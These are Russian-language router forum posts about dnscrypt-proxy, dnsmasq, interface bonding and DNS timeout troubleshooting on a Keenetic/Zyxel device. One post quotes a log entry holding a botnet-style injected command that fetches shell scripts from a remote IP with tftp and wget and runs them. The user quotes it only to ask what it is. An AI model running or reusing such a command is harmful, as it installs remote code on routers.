vasek00

1% из 100 понимаю, если вам оказалось это нужно, но не всем. Пример нужности следующего решения решать вам : - стандартная работа DNS на роутере - послать запрос по адресу из resolv (от провадйера) если нет ответа то по списку по порядку, т.е. следующему. - или послать сразу запрос на несколько (желательно два) но адреса не с одного места где будет быстрее? По поводу 4 интерфейсов скажу примером - некоторые пользователи когда спрашиваю зачем вам дома 1GB говорят гонять файлы, тоже наверное нужная функция для дома (от себя имею ПК, NAS и роутер с портами 1GB). Опять в догонку, извиняюсь за не внимательно читаю, а функция для дома-дача-загородные дома ---- можно пример. В городе проводной инет, дача\загородный дом интернет от сотового?

А у меня например 100Мбит и хочу более, есть два входа интернета ? Для справки и кто не хочет читать что это : mode=0 (balance-rr) Этот режим используется по-умолчанию, если в настройках не указано другое. balance-rr обеспечивает балансировку нагрузки и отказоустойчивость. В данном режиме пакеты отправляются "по кругу" от первого интерфейса к последнему и сначала. Если выходит из строя один из интерфейсов, пакеты отправляются на остальные оставшиеся.При подключении портов к разным коммутаторам, требует их настройки. mode=1 (active-backup) При active-backup один интерфейс работает в активном режиме, остальные в ожидающем. Если активный падает, управление передается одному из ожидающих. Не требует поддержки данной функциональности от коммутатора. mode=2 (balance-xor) Передача пакетов распределяется между объединенными интерфейсами по формуле ((MAC-адрес источника) XOR (MAC-адрес получателя)) % число интерфейсов. Один и тот же интерфейс работает с определённым получателем. Режим даёт балансировку нагрузки и отказоустойчивость. mode=3 (broadcast) Происходит передача во все объединенные интерфейсы, обеспечивая отказоустойчивость. mode=4 (802.3ad) Это динамическое объединение портов. В данном режиме можно получить значительное увеличение пропускной способности как входящего так и исходящего трафика, используя все объединенные интерфейсы. Требует поддержки режима от коммутатора, а так же (иногда) дополнительную настройку коммутатора. mode=5 (balance-tlb) Адаптивная балансировка нагрузки. При balance-tlb входящий трафик получается только активным интерфейсом, исходящий - распределяется в зависимости от текущей загрузки каждого интерфейса. Обеспечивается отказоустойчивость и распределение нагрузки исходящего трафика. Не требует специальной поддержки коммутатора. mode=6 (balance-alb) Адаптивная балансировка нагрузки (более совершенная). Обеспечивает балансировку нагрузки как исходящего (TLB, transmit load balancing), так и входящего трафика (для IPv4 через ARP). Не требует специальной поддержки коммутатором, но требует возможности изменять MAC-адрес устройства. И учтем что должно быть два устройства, а если оба или более Zyxel. И в догонку если так подходить то - точно так же как и туннели для дома.

И не только в Asus. По скрину ниже так же 1Gb порты, где eth0 - шина внешний switch (vlan1-LAN, vlan2-WAN), br0=wi-fi+LAN Пока не скажу про Ultra II и необходимость на 1Gb портах, хотя Asus 88u имеет такую фишку https://www.asus.com/ru/support/faq/1016088 Или Cisco - http://img.nag.ru/projects/setup/15c/745a932f489445f33d20ec3be7d97804.pdf

ДА.

Возможно ли реализация механизма bonding (агрегации нескольких сетевых интерфейсов в единый логический интерфейс). http://vasilisc.com/ethernet-bonding https://wiki.mikrotik.com/images/f/f7/X1-Bondingv01.2006.pdf http://www.k-max.name/linux/teaming-bonding-na-debian-linux/

Не большой тест на примере двух resolv и двух каналах при применении dnscrypt при сравнении работы на одном канале и с одним resolv на cisco и близко не было к такому результату. Скрины с клиента в локальной сети роутера и с установленном на нем IP DNS -роутера.

При первом приближение все работает на два канала при В итоге, запрос от клиента локальной сети попадает на роутер c него уходят запросы сразу же на два resolv - cisco и dnscrypt.eu-dk и два есть прихода ответов на эти запросы, очередность запросов всегда одна а вот очередность прихода ответов на эти запросы бывают разные (т.е. то с одного канала первым приходит, то со второго канала приходит)

На релизе dnscrypt-proxy 1.9.5 есть возможность использовать списки блокировки используя plugins например строка запуска ARGS="--local-address=127.0.0.2:65053 --daemonize –edns-payload-size=1252 -R cisco -l /opt/tmp/dnscrypt-proxy.65053.log -m 7 \ --plugin=libdcplugin_example_ldns_blocking.so,--ips=/opt/tmp/blk-ips,--domains=/opt/tmp/blk-names" где в файлах /opt/tmp/blk-names и /opt/tmp/blk-ips естественно лежат имена и адреса нужных для блокировки в формате - адреса IPv4 и IPv6, а для имен групповые символы (*) пример *xxx*, *.example.com, ads.* простой пример блокировки youtube.com -> в файле /opt/tmp/blk-names прописать youtube.com Можно использовать как альтернативу в место dnsmasq addn-hosts=/opt/tmp/hosts0 addn-hosts=/opt/tmp/malwaredom_block.host addn-hosts=/opt/tmp/mvps_block.host Другие примеры: # dnscrypt-proxy --plugin=libdcplugin_example_ldns_opendns_set_client_ip.so,192.30.252.130 # dnscrypt-proxy --plugin=libdcplugin_example_ldns_opendns_deviceid.so,/opt/etc/umbrella-password.txt так же возможен вариант например использовать не один а два резолва: ARGS1="--local-address=127.0.0.2:65053 --daemonize .... -R cisco -l /opt/tmp/dnscrypt-proxy.65053.log -m 7 ...." ARGS2="--local-address=127.0.0.2:65153 --daemonize .... -R ns0.dnscrypt.is -l /opt/tmp/dnscrypt-proxy.65153.log -m 7 ...." тогда в dnsmasq конфиге server=127.0.0.2#65053 server=127.0.0.2#65153 А если добавить в конфиг строчку all-servers то можно получить одновременно запрос на все сервера которые имеются в строчках server (порождает чуток избыточный трайик, но по моему у кого безлим не принципиально). А если еще и два канала то запросы можно развернуть один на один канал, другой на другой (хоть он например и в резерве весит) информация по IP для маршрута можно взять из файла dnscrypt-resolvers-conf ищется нужная запись и на против нее поиск Ip адреса или любым приложением которое есть в opkg или в системе.

Релиз 2.10 Проверьте еще раз настройку (можно конфиг посмотреть для достоверности, а то может WEB что-то начудил, при не однократной настройке), отключите pingchek. Должно все работать. Для системы по барабану основной или резервный - только default маршрут, а вот переключение его и что считать основным и резервным это уже доп.функция основанная на приоритете интерфейса и доступности другой стороны на нем.

С 15.08 с того что выше по логам Tue Aug 15 11:50:21 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:51:21 2017 [DEBUG] resolver timeout (UDP) по 17.08 13:23 тишина - все ОК, 15.08 после этой ошибки в 12:00 вернулся на cisco resolv, до этого был cypherpunks.ru

Словил ошибку, все больше склоняюсь что все таки на роутере что-то забывает соединения, после продолжительного времени без действия клиента (не пользованием браузером минут 40) вчера сменил cisco на dnscrypt-proxy --local-address=127.0.0.2:65053 --daemonize dns-payload-size=1252 -R cypherpunks.ru dnscrypt-proxy Tue Aug 15 10:23:57 2017 [INFO] Server key fingerprint is CC02:411D:EA4B:F44D:0E5F:7A18:957B:E8DD:F059:C259:B504:473E:4453:F3BB:CB95:8203 Tue Aug 15 11:23:59 2017 [INFO] Refetching server certificates Tue Aug 15 11:23:59 2017 [INFO] Server certificate with serial #1493333335 received Tue Aug 15 11:23:59 2017 [INFO] This certificate is valid Tue Aug 15 11:23:59 2017 [INFO] Chosen certificate #14933333335 is valid from [2017-05-26] to [2018-05-26] Tue Aug 15 11:23:59 2017 [INFO] The key rotation period for this server may exceed the recommended value. This is bad for forward secrecy. Tue Aug 15 11:23:59 2017 [INFO] Server key fingerprint is CC02:411D:EA4B:F44D:0E5F:7A18:957B:E8DD:F059:C259:B504:473E:4453:F3BB:CB95:8203 Tue Aug 15 11:50:20 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:50:20 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:50:20 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:50:21 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:50:21 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:50:21 2017 [DEBUG] resolver timeout (UDP) Tue Aug 15 11:51:21 2017 [DEBUG] resolver timeout (UDP) По Dnsmasq Aug 15 11:50:24 dnsmasq[789]: query[A] dns.msftncsi.com from 192.168.130.2 Aug 15 11:50:24 dnsmasq[789]: forwarded dns.msftncsi.com to 127.0.0.2 ... Aug 15 11:50:26 dnsmasq[789]: query[A] avatars.mds.yandex.net from 192.168.130.2 Aug 15 11:50:26 dnsmasq[789]: forwarded avatars.mds.yandex.net to 127.0.0.2 Aug 15 11:50:26 dnsmasq[789]: query[A] yastatic.net from 192.168.130.2 Aug 15 11:50:26 dnsmasq[789]: forwarded yastatic.net to 127.0.0.2 ... Aug 15 11:50:30 dnsmasq[789]: query[A] forum.keenetic.net from 192.168.130.2 Aug 15 11:50:30 dnsmasq[789]: forwarded forum.keenetic.net to 127.0.0.2 Aug 15 11:50:30 dnsmasq[789]: query[A] forum.keenetic.net from 192.168.130.2 Aug 15 11:50:30 dnsmasq[789]: forwarded forum.keenetic.net to 127.0.0.2 сегодня в 11:50 попытка просмотреть страницу которая открылась спустя наверное 1-1,5минуту после повторного нажатия открытия. Дерганье netfilter.d Tue Aug 15 11:14:46 MSK 2017 track --- tables = filter Tue Aug 15 11:57:07 MSK 2017 track --- tables = filter Log роутера Aug 15 11:14:46ndm kernel: IPv4 conntrack lan: flushed 1 entries with address 192.168.130.19 Aug 15 11:14:46ndm kernel: SWNAT bind table cleared Aug 15 11:57:07ndm kernel: SWNAT bind table cleared

За Aug 11 всего один раз, за Aug 12 не разу.

Улучшена работа DNSCrypt-proxy тестовое обновление http://entware-3x.zyxmon.org/binaries/mipsel/test/dnscrypt-proxy_1.9.5-4a_mipsel-3x.ipk и http://entware-3x.zyxmon.org/binaries/mipsel/test/libsodium_1.0.13-1_mipsel-3x.ipk

Смотрю дальше, проблем пока не видно, если не смотреть данный лог от dnscrypt-proxy то все ОК. Сервер пока один cisco протокл UDP.

Мне вот интересно какое отношение ко всему этому имеет [E] Aug 9 01:41:22 ndm: Core::Authenticator: no such user: "cd /tmp || cd /mnt || cd /var; tftp -r tftp.sh -g 89.248.162.146; sh tftp.sh; wget http://89.248.162.146/bin.sh; sh bin.sh; busybox wget http://89.248.162.146/bin1.sh; sh bin1.sh". скачать tftp.sh запустить его и далее два bin (это html страница для вывода на экрна информации про Wowza Media Server)

За сутки с небольшим - анализ работы на много лучше чем было ранее (ощущение по отзывчивости). Так проверял в основном udp работу при конфиге ниже : Созданный dnscrypt-proxy.60053.log чистый с момента запуска в нем тишина. Пока без замечаний. Sun Aug 5 11:39:29 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5 Sun Aug 5 11:39:29 2017 [INFO] Generating a new session key pair Sun Aug 5 11:39:29 2017 [INFO] Done Sun Aug 5 11:39:29 2017 [INFO] Server certificate with serial #1493333488 received Sun Aug 5 11:39:29 2017 [INFO] This certificate is valid Sun Aug 5 11:39:29 2017 [INFO] Chosen certificate #1493333488 is valid from [2017-03-24] to [2018-03-24] Sun Aug 5 11:39:29 2017 [INFO] The key rotation period for this server may exceed the recommended value. This is bad for forward secrecy. Sun Aug 5 11:39:29 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778 Sun Aug 5 11:39:29 2017 [NOTICE] Proxying from 127.0.0.2:60053 to 208.67.220.220:443 Sun Aug 5 12:41:00 2017 [INFO] Refetching server certificates Sun Aug 5 12:41:00 2017 [INFO] Server certificate with serial #1493333488 received Sun Aug 5 12:41:00 2017 [INFO] This certificate is valid Sun Aug 5 12:41:00 2017 [INFO] Chosen certificate #1493333488 is valid from [2017-03-24] to [2018-03-24] Sun Aug 5 12:41:00 2017 [INFO] The key rotation period for this server may exceed the recommended value. This is bad for forward secrecy. Sun Aug 5 12:41:00 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778 .... По dnsmasq log Выяснился еще один баг или точнее не баг, а то как настроена система. Клиент ping на адрес из /opt/tmp/malwaredom_block.host - "0.0.0.0 www.w......o.com" на клиенте все нормально, но если выполнять локально на роутере, то получаем Решение проблемы настройка более правельнее ниже Теперь все правельно. Текущий конфиг для DNSmasq более оптимальный для работы, вопрос открытый только по какому варианту работает ПРОШИВКА если ей нужно обратиться по мнемонике - тут два варианта "localhost:domain" или по интерфейсу "br0:domain"

Это понятно, нужно время на оценку возможной проблемы (по сравнению с той что была) и то что она случайная или постоянная.

Ну вообще порадовали. Пока все запустилось.

ОК и СПС Поставил, запустил. Разберусь с релизами сейчас. /opt/etc/init.d # lsof | grep libsodium dnscrypt- 5301 root mem REG 8,2 464288 4357 /opt/lib/libsodium.so.18.3.0 /opt/etc/init.d # Да это он _sodium_malloc 1.0.13 ...

Я его dnscrypt proxy пока отключил переименовав скрипт запуска S* на K*, и пробую связку dnsmasq+https_dns_proxy

После недельного "тупизма" на роутере при связке dnsmasq+dnscrypt-proxy тупизм в том что при настройках (даже когда в схеме один роутер + интернет) когда по долгу читаешь страницы в интернете то появляются куча localhost:38552 localhost:domain TIME_WAIT или udp 17 26 src=127.0.0.1 dst=127.0.0.1 sport=56695 dport=60053 packets=10 bytes=680 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=56695 packets=0 bytes=0 mark=0 use=2 udp 17 16 src=127.0.0.1 dst=127.0.0.1 sport=56846 dport=60053 packets=10 bytes=570 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=56846 packets=0 bytes=0 mark=0 use=2 udp 17 9 src=127.0.0.1 dst=127.0.0.1 sport=38305 dport=60053 packets=10 bytes=610 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=38305 packets=0 bytes=0 mark=0 use=2 udp 17 12 src=127.0.0.1 dst=127.0.0.1 sport=13396 dport=60053 packets=10 bytes=630 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=13396 packets=0 bytes=0 mark=0 use=2 udp 17 9 src=127.0.0.1 dst=127.0.0.1 sport=10493 dport=60053 packets=2 bytes=112 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=10493 packets=0 bytes=0 mark=0 use=2 udp 17 5 src=127.0.0.1 dst=127.0.0.1 sport=41603 dport=60053 packets=10 bytes=710 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=41603 packets=0 bytes=0 mark=0 use=2 udp 17 3 src=127.0.0.1 dst=127.0.0.1 sport=9064 dport=60053 packets=10 bytes=600 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=9064 packets=0 bytes=0 mark=0 use=2 а так же пролет запроса DNS не туда куда надо udp 17 20 src=IP_белый_Zyxel dst=IP_DNS_провайдера sport=48138 dport=53 packets=1 bytes=66 src=IP_DNS_провайдера dst=IP_белый_Zyxel sport=53 dport=48138 packets=1 bytes=116 mark=0 use=2 из-за dnsmasq 907 nobody 4u IPv4 2691 0t0 UDP 192.168.1.100:domain dnsmasq 907 nobody 5u IPv4 2692 0t0 TCP 192.168.1.100:domain (LISTEN) dnsmasq 907 nobody 6u IPv4 2693 0t0 UDP localhost:domain dnsmasq 907 nobody 7u IPv4 2694 0t0 TCP localhost:domain (LISTEN) dnsmasq 907 nobody 8u IPv6 2695 0t0 UDP [fe80::...:e2a8]:domain dnsmasq 907 nobody 9u IPv6 2696 0t0 TCP [fe80::...:e2a8]:domain (LISTEN) dnsmasq 907 nobody 10u IPv6 2697 0t0 UDP localhost:domain dnsmasq 907 nobody 11u IPv6 2698 0t0 TCP localhost:domain (LISTEN) Решил попробовать другую связку с dnsmasq+https_dns_proxy (до следующих обновлений сервисов dnsmasq dnscrypt-proxy и библиотек для них в Entware) 1.dnsmasq остаеться со своими настройками 2. https_dns_proxy насраивается на порт 60053 (сервера будут googla) ARGS="-a 127.0.0.1 -p 65053 -d" Итак имеем 9855 nobody 6256 S https_dns_proxy -a 127.0.0.1 -p 60053 -d tcp 0 0 localhost:domain 0.0.0.0:* LISTEN 907/dnsmasq tcp 0 0 192.168.1.100:domain 0.0.0.0:* LISTEN 907/dnsmasq tcp 0 0 localhost:domain :::* LISTEN 907/dnsmasq tcp 0 0 fe80::.........8:domain :::* LISTEN 907/dnsmasq udp 0 0 localhost:60053 0.0.0.0:* 9855/https_dns_prox udp 0 0 localhost:domain 0.0.0.0:* 907/dnsmasq udp 0 0 192.168.1.100:domain 0.0.0.0:* 907/dnsmasq udp 0 0 localhost:domain :::* 907/dnsmasq udp 0 0 fe80::................8:domain :::* 907/dnsmasq

В виду невозможности использовать конфиг для данного релиза DNSCrypt-proxy подправил dnsmasq и сам DNSCrypt-proxy (для пробы пока на два resolver - cisco и d0wn-ru-ns1) В результате получили два потока (шифрования) для DNS запросов на разные resolver с разными протоколами - cisco (поток UDP) и d0wn-ru-ns1 (поток TCP)

Возможно ли поднять в OPKG lib библиотеку /opt/etc/init.d # opkg list | grep libsodium libsodium - 1.0.12-1 - NaCl (pronounced "salt") is a new easy-to-use high-speed software library for network communication, encryption, decryption, signatures, etc. NaCl's goal is to provide all of the core operations needed to build higher-level cryptographic tools. Sodium is a portable, cross-compilable, installable, packageable fork of NaCl (based on the latest released upstream version nacl-20110221), with a compatible API. The design choices, particularly in regard to the Curve25519 Diffie-Hellman function, emphasize security (whereas NIST curves emphasize "performance" at the cost of security), and "magic constants" in NaCl/Sodium have clear rationales. The same cannot be said of NIST curves, where the specific origins of certain constants are not described by the standards. And despite the emphasis on higher security, primitives are faster across-the-board than most implementations of the NIST standards. /opt/etc/init.d # до релиза 1.0.13 https://github.com/jedisct1/dnscrypt-proxy/issues/542

Прояснить ситуация по данной команде - SWNAT bind table cleared, в какой момент она происходит релиз - 2.10. На роутере используется ip hotspot - т.е. не зарегистрированным клиентам не разрешен выход в интернет, но возникают моменты (когда долго не пользуешься интернетом, "фризы" на клиенте по просмотру страниц или к доступу на роутер WEB "фриз", решается ping на любой сайт на клиенте и потом все работает) ip hotspot host хх:хх:хх:хх:хх:хх permit .... default-policy deny На роутере стоит dnscrypt-proxy -> локальный сервис запущенный на 127.0.0.1:65553, т.е. работает пока есть запросы от клиента в интернет, если их нет долгое время то получаем "фриз" на клиенте, последний релиз 2.10 не исправляет ситуацию. Если опять же дать на клиенте ping на любой сайт то начинает работать. Попробую еще по наблюдать, так как dnscrypt-proxy все таки локальный сервис "не из коробки", но может есть какие либо ограничения на локальные сервисы, он весит на : Если ли какие timeout в данном сервисе ip hotspot например idle, keepalive, login или почему он считает что устройство не имеет разрешения на выход в интернет.